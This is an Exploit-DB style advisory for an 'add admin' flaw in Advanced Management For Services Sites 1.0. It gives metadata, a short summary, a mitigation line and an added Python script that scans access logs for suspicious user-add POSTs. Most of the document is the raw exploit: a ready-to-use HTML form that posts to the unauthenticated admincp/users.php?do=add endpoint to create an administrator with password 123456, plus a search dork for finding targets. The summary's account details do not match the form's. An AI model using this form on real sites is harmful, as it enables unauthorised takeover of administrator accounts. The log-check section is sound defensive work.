Vendor: Advanced Management For Services Sites
By: alnjm33
CVSS: 7.5 (HIGH)
Title: Remote add admin exploit
CWE: 264
Product Name: Advanced Management For Services Sites
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: am4ss
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Advanced Management For Services Sites Remote add admin exploit

This exploit allows an attacker to add an admin user to the Advanced Management For Services Sites (AM4SS) software. The attacker can use the Dork 'trace find it' to locate vulnerable sites and then use the provided HTML code to add an admin user with the username 'admin', email 'admin@demo.net', password '123456' and group '1'.

Mitigation:

Update AM4SS to a patched release (this entry lists a patch as existing) and ensure that all users have strong passwords.
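
A log check for the request that the proof-of-concept form sends (a POST to admincp/users.php?do=add), as an added example that is not part of the original advisory or of AM4SS. It assumes a Combined Log Format access log; the log lines, the host name shop.example.test and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)
SITE_HOST = "shop.example.test"  # assumption: host name of the protected site

SAMPLE_LOG = [  # constructed log lines, not real traffic
    '203.0.113.7 - - [12/Mar/2020:10:01:02 +0000] "POST /am4ss//admincp//users.php?do=add HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2020:10:05:40 +0000] "POST /am4ss/admincp/users.php?do=add HTTP/1.1" 302 0 "http://other.example.net/form.html" "Mozilla/5.0"',
    '192.0.2.4 - - [12/Mar/2020:10:09:11 +0000] "POST /am4ss/admincp/users.php?do=add HTTP/1.1" 302 0 "http://shop.example.test/am4ss/admincp/users.php" "Mozilla/5.0"',
    '192.0.2.4 - - [12/Mar/2020:10:09:30 +0000] "GET /am4ss/admincp/users.php?do=add HTTP/1.1" 200 4096 "http://shop.example.test/am4ss/admincp/index.php" "Mozilla/5.0"',
]

def _norm(path):
    """Lower-case and collapse repeated slashes (the PoC posts to //admincp//)."""
    return re.sub(r"/{2,}", "/", path).lower()

def is_user_add(target):
    """True if the request target is admincp/users.php with do=add."""
    path, _, query = target.partition("?")
    return (_norm(path).endswith("/admincp/users.php")
            and "add" in parse_qs(query).get("do", []))

def suspicious_user_adds(lines, site_host=SITE_HOST):
    """Return (ip, time, reason) for user-add POSTs not sent from the admin panel."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_user_add(m["target"]):
            continue
        ref = urlsplit(m["referer"])
        if m["referer"] in ("", "-"):
            reason = "no referer"
        elif ref.hostname != site_host:
            reason = "off-site referer"
        elif "/admincp/" not in _norm(ref.path):
            reason = "referer outside admincp"
        else:
            continue  # submitted from the admin panel's own pages
        hits.append((m["ip"], m["time"], reason))
    return hits

if __name__ == "__main__":
    for hit in suspicious_user_adds(SAMPLE_LOG):
        print(hit)
```

A missing or off-site Referer is a triage signal only, since any client can set that header; confirm each hit against the accounts that actually exist in the admin group.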

Exploit-DB raw data:

 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : Advneced Management For Services Sites Remote add admin exploit
Author: alnjm33
Software Link: http://am4ss.com/am4ss.zip
Tested on: Version 1.0
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                          find it
================================Exploit=============================================
<html dir="rtl">
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>sec-war.com</title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form method="post" action="http://localhost/am4ss//admincp//users.php?do=add">
    <p align="center"><b><br>
    login with </b></p>
    <p align="center"><a href="mailto:sec-war@demo.net"><font color="#C0C0C0">
    sec-war@demo.net</font></a></p>
    <p align="center"><b>pass</b></p>
    <p align="center">123456</p>
    <table class="tborder" id="table32" style="BORDER-COLLAPSE: separate" cellSpacing="0" cellPadding="4" width="90%" align="center" border="0">
        <colgroup span="2">
            <col style="WIDTH: 45%"><col style="WIDTH: 55%">
        </colgroup>
        <thead>
            <tr>
                <td class="tcat" align="middle" colSpan="2" height="27"><b>add new admin </b>
                </td>
            </tr>
        </thead>
        <tr vAlign="top">
            <td class="optiontitle" colSpan="2">
            <p align="center"> </td>
        </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center">Name*</div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="userfullname" value="Security War">
                </td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <p align="center">PASS must me*</td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
                </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center">username email *</div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
                </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                 </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center"><font face="Tahoma">forget it i made it
                    egypt</font></div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <select class="Edits" style="width: 181; height: 53" name="country" size="99" tabindex="10">
                <option value="ET"></option>
                <option>--   --</option>
                <option value="MA"> </option>
                <option value="EG" selected></option>
                </select> <span lang="fr">  </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center"><font face="Tahoma">forget it i made it
                    admin </font></div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <select name="usergroup" size="1" tabindex="1">
                <option value="3"></option>
                <option value="2"></option>
                <option value="1"></option>
                </select> <span lang="fr">  </span></td>
            </tr>
            <tbody id="tbody_bbtitle">
            <tr>
                <td class="tfoot" align="middle" colSpan="2">
                <input class="button" id="submit" type="submit" value="ok add  "> 
                </td>
            </tr>
    </table>
    <input type="hidden" name="do" value="save">
</form>
</body>
</html>